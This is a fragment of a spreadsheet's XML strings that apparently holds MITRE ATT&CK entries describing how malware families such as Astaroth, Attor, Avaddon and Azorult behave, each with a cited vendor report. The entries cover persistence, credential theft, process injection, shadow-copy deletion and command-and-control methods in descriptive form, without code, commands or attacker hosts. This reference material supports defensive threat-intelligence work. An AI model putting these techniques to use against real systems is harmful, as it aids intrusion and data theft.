    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display a host's ARP cache, which may include address resolutions for remote systems.(Citation: TechNet Arp)(Citation: Palo Alto ARP)</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display ARP configuration information on the host.(Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses ActiveX objects for file execution and manipulation. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can launch itself via DLL Search Order Hijacking.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. (Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used a DGA in C2 communications.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) exfiltrates collected information from its r1.log file to the external C2 server. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) loads its module with the XSL script parameter &lt;code&gt;vShow&lt;/code&gt; set to zero, which opens the application with a hidden window. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses [certutil](https://attack.mitre.org/software/S0160) and [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional malware. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses JavaScript to perform its core functionalities. (Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) logs keystrokes from the victim's machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects data in a plaintext file named r1.log before exfiltration. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious files including VBS, LNK, and HTML for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can abuse alternate data streams (ADS) to store content for malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) searches for different processes on the system.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) creates a startup item for persistence. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can be loaded through regsvr32.exe.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) checks for the presence of Avast antivirus in the &lt;code&gt;C:\Program\Files\&lt;/code&gt; folder. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses the LoadLibraryExW() function to load additional modules. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373)'s initial payload is a malicious .LNK file. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a software packer called Pe123\RPolyCryptor.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) encodes data using Base64 before sending it to the C2 server. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the machine name and keyboard language from the system. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the external IP address from the system. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the timestamp from the infected machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious VBS e-mail attachments for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) spawns a CMD process to execute commands. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses WMIC to execute payloads. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)’s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script &lt;code&gt;HKEY_CURRENT_USER\Environment "UserInitMprLogonScript" &lt;/code&gt;.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can use TCP to communicate with command and control servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect information about installed AV products from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the hostname and OS information from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can use HTTP to communicate with its C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [AuTo Stealer](https://attack.mitre.org/software/S1029) can use `cmd.exe` to execute a created batch file.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) uses XOR and RC4 to perform decryption on the code functions.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can delete files from the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can search through folders and files on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can download files and additional malware.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) encrypts the configuration.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can inject code from files to other running processes.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can utilize proxy for communications.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can open a reverse shell on the system to execute commands.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is installed as a new service on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) attempts to escalate privileges by bypassing User Access Control.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) downloads a PowerShell script that decodes to a typical shellcode loader.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) has sent a C2 response that was base64-encoded.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t xml:space="preserve">[Avaddon](https://attack.mitre.org/software/S0640) bypasses UAC using the CMSTPLUA COM interface.(Citation: Arxiv Avaddon Feb 2021) </t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) encrypts the victim system using a combination of AES256 and RSA encryption schemes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has decrypted encrypted strings.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop anti-malware solutions.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has searched for specific files prior to encryption.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) deletes backups and shadow copies using native system tools.(Citation: Hornet Security Avaddon June 2020)(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has been executed through a malicious JScript downloader.(Citation: Hornet Security Avaddon June 2020)(Citation: Awake Security Avaddon)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) modifies several registry keys for persistence and UAC bypass.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has used the Windows Crypto API to generate an AES key.(Citation: Hornet Security Avaddon June 2020)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has enumerated shared folders and mapped volumes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has used encrypted strings.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has collected information about running processes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) uses registry run keys for persistence.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop database processes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) can collect the external IP address of the victim.(Citation: Awake Security Avaddon)</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) uses wmic.exe to delete shadow copies.(Citation: Hornet Security Avaddon June 2020)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) </t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials from the victim's browser.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) uses an XOR key to decrypt content and uses Base64 to decode the C2 address.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can delete files from victim machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can recursively search for files in folders and collects files from the desktop with certain extensions.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can download and execute additional files. [Azorult](https://attack.mitre.org/software/S0344) has also downloaded a ransomware payload called Hermes.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can check for installed software on the system under the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Uninstall&lt;/code&gt;.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can capture screenshots of the victim’s machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can encrypt C2 traffic using XOR.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect host IP information from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the username from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the time zone information from the system.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>The "ZR" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) will check to see if known host-based firewalls are installed on the infected systems. [BACKSPACE](https://attack.mitre.org/software/S0031) will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to upload files to the C2 Server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) allows adversaries to search for files.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>The "ZJ" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of deleting Registry keys, sub-keys, and values on a victim system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Newer variants of [BACKSPACE](https://attack.mitre.org/software/S0031) will encode C2 communications with a custom system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) may collect information about running processes.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of enumerating and making modifications to an infected system's Registry.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>During its initial execution, [BACKSPACE](https://attack.mitre.org/software/S0031) extracts operating system information from the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to execute from the command line on infected hosts, or have [BACKSPACE](https://attack.mitre.org/software/S0031) create a reverse shell.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) disables the Windows firewall before binding to a port.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) modifies the firewall Registry key &lt;code&gt;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List&lt;/code&gt;.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) communicates on ports 443 and 8000 with a FakeTLS method.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) uses a FakeTLS method during C2.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) functions as a proxy server between the victim and C2 server.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) encrypts C2 traffic using an XOR/ADD cipher.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the computer name and host name on the compromised system.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the network adapter information.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has compressed data using the aPLib compression library.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has uploaded files from victims' machines.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) can decode shellcode using a custom rotating XOR cipher.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has searched for files on the infected host.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has download files from its C2 server.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.(Citation: Accenture MUDCARP March 2019)</t>
